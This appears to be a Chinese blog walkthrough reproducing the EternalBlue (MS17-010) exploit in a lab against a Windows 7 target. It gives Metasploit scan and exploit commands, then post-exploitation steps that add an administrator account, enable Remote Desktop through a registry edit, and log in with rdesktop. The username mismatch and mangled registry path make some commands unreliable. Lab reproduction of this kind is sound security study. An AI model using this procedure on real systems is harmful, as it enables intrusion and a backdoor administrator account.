zoukankan      html  css  js  c++  java
  • 永恒之蓝MS17-010漏洞复现

    一、

    攻击机:kaili系统

    靶机:win7系统

    首先用nmap扫描目标主机是否开启445端口

    在kali开启msfconsole的smb模块扫描输入:use auxiliary/scanner/smb/smb_ms17_010

    set rhosts 192.168.80.134(目标主机ip)

    然后直接run

    出现Host is likely VULNERABLE to MS17-010! (表示有这个漏洞)

     

    二、使用模块进行攻击

    use exploit/windows/smb/ms17_010_eternalblue

     set RHOST 192.168.80.134

     查看设置选项:show options

    开始攻击:exploit或run

     攻击成功

    三、通过sheel对靶机进行远程打开电脑桌面进行控制

    1、首先创建用户名和密码

    net user blue blue /add

    2、将用户hack添加入管理组 

    net localgroup administrators hack /add

    3、

    开启远程桌面功能
    REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

    4、打开Kali远程桌面连接Win7 

    rdesktop 192.168.80.134:3389

     

     5、输入创建的hack用户登陆成功

     

     

     
  • 相关阅读:
    我要变牛逼
    java web
    导师选择
    2.1进程
    来到博客园写东西的第一天
    简单的页面布局
    html5
    第一个servlet程序
    java2D
    字节流 文件字节流 缓冲字节流
  • 原文地址:https://www.cnblogs.com/wenyoudo/p/14335991.html
Copyright © 2011-2022 走看看